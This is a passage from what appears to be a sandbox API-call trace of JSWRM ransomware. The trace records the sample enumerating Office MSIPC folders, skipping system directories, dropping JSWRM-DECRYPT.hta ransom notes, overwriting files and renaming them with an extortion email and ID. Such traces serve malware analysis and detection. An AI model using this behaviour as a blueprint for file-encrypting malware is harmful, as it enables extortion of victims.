nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.467] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.467] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.467] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4800111c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4800111c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4800111c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.467] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.467] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.467] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.467] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.467] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.467] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.467] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.468] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.468] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.468] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.468] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.468] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hu\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hu\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.469] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21656) returned 1 [0136.469] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.469] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5490, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5490, lpOverlapped=0x0) returned 1 [0136.472] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.472] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5490, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5490, lpOverlapped=0x0) returned 1 [0136.473] CloseHandle (hObject=0x314) returned 1 [0136.473] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hu\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hu\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\hu\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\hu\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.474] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4646280, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4646280, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf4646280, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5498, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.474] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0136.474] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x63a229e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="id", cAlternateFileName="")) returned 1 [0136.474] lstrcmpiW (lpString1="id", lpString2=".") returned 1 [0136.474] lstrcmpiW (lpString1="id", lpString2="..") returned 1 [0136.474] lstrcmpiW (lpString1="id", lpString2="...") returned 1 [0136.474] lstrcmpiW (lpString1="id", lpString2="windows") returned -1 [0136.474] lstrcmpiW (lpString1="id", lpString2="recovery") returned -1 [0136.474] lstrcmpiW (lpString1="id", lpString2="perflogs") returned -1 [0136.474] lstrcmpiW (lpString1="id", lpString2="documents and settings") returned 1 [0136.474] lstrcmpiW (lpString1="id", lpString2="$RECYCLE.BIN") returned 1 [0136.474] lstrcmpiW (lpString1="id", lpString2="system volume information") returned -1 [0136.474] lstrcmpiW (lpString1="id", lpString2="msocache") returned -1 [0136.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\id\\jswrm-decrypt.hta")) returned 0xffffffff [0136.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\id\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.476] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.476] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, lpOverlapped=0x0 | out: lpBuffer=0x345b8a0*, lpNumberOfBytesWritten=0x345b86c*=0x230c, lpOverlapped=0x0) returned 1 [0136.477] CloseHandle (hObject=0x238) returned 1 [0136.478] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\id\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\id\\jswrm-decrypt.hta")) returned 0x20 [0136.478] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\id\\*.*", lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48027652, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName=".", cAlternateFileName="")) returned 0x231b40 [0136.478] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0136.478] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x48027652, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="..", cAlternateFileName="")) returned 1 [0136.478] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0136.478] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0136.478] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48027652, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x48027652, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x48027652, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0136.478] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0136.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0136.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0136.478] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x63a229e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 1 [0136.478] lstrcmpiW (lpString1="msipc.dll.mui", lpString2=".") returned 1 [0136.478] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="..") returned 1 [0136.479] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="...") returned 1 [0136.479] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="windows") returned -1 [0136.479] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="recovery") returned -1 [0136.479] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="perflogs") returned -1 [0136.479] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="documents and settings") returned 1 [0136.479] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0136.479] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="system volume information") returned -1 [0136.479] lstrcmpiW (lpString1="msipc.dll.mui", lpString2="msocache") returned -1 [0136.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0136.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msipc.dll.mui", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msipc.dll.mui", lpUsedDefaultChar=0x0) returned 13 [0136.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\id\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\id\\msipc.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0136.480] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=21144) returned 1 [0136.480] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.480] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x5290, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x5290, lpOverlapped=0x0) returned 1 [0136.483] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.483] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x5290, lpOverlapped=0x0) returned 1 [0136.483] CloseHandle (hObject=0x314) returned 1 [0136.483] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\id\\msipc.dll.mui" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\id\\msipc.dll.mui"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\id\\msipc.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\id\\msipc.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0136.484] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x63a229e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x63a229e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x63a229e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5298, dwReserved0=0x60002, dwReserved1=0x224b1c, cFileName="msipc.dll.mui", cAlternateFileName="MSIPCD~1.MUI")) returned 0 [0136.484] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0136.484] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18ae17b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18ae17b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ae17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10fcc8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="ipcsecproc.dll", cAlternateFileName="IPCSEC~1.DLL")) returned 1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2=".") returned 1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="..") returned 1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="...") returned 1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="windows") returned -1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="recovery") returned -1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="perflogs") returned -1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="documents and settings") returned 1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="$RECYCLE.BIN") returned 1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="system volume information") returned -1 [0136.484] lstrcmpiW (lpString1="ipcsecproc.dll", lpString2="msocache") returned -1 [0136.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipcsecproc.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0136.484] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipcsecproc.dll", cchWideChar=14, lpMultiByteStr=0x345ebd8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipcsecproc.dll", lpUsedDefaultChar=0x0) returned 14 [0136.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipcsecproc.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0136.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ipcsecproc.dll", cchWideChar=14, lpMultiByteStr=0x345eba8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ipcsecproc.dll", lpUsedDefaultChar=0x0) returned 14 [0136.485] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59b433, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59b433, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59b433, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="it", cAlternateFileName="")) returned 1 [0136.485] lstrcmpiW (lpString1="it", lpString2=".") returned 1 [0136.485] lstrcmpiW (lpString1="it", lpString2="..") returned 1 [0136.485] lstrcmpiW (lpString1="it", lpString2="...") returned 1 [0136.485] lstrcmpiW (lpString1="it", lpString2="windows") returned -1 [0136.485] lstrcmpiW (lpString1="it", lpString2="recovery") returned -1 [0136.485] lstrcmpiW (lpString1="it", lpString2="perflogs") returned -1 [0136.485] lstrcmpiW (lpString1="it", lpString2="documents and settings") returned 1 [0136.485] lstrcmpiW (lpString1="it", lpString2="$RECYCLE.BIN") returned 1 [0136.485] lstrcmpiW (lpString1="it", lpString2="system volume information") returned -1 [0136.485] lstrcmpiW (lpString1="it", lpString2="msocache") returned -1 [0136.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\it\\jswrm-decrypt.hta")) returned 0xffffffff [0136.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0136.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b78c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0136.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\MSIPC\\it\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msipc\\it\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0136.486] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.486] WriteFile (in: hFile=0x238, lpBuffer=0x345b8a0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b86c, 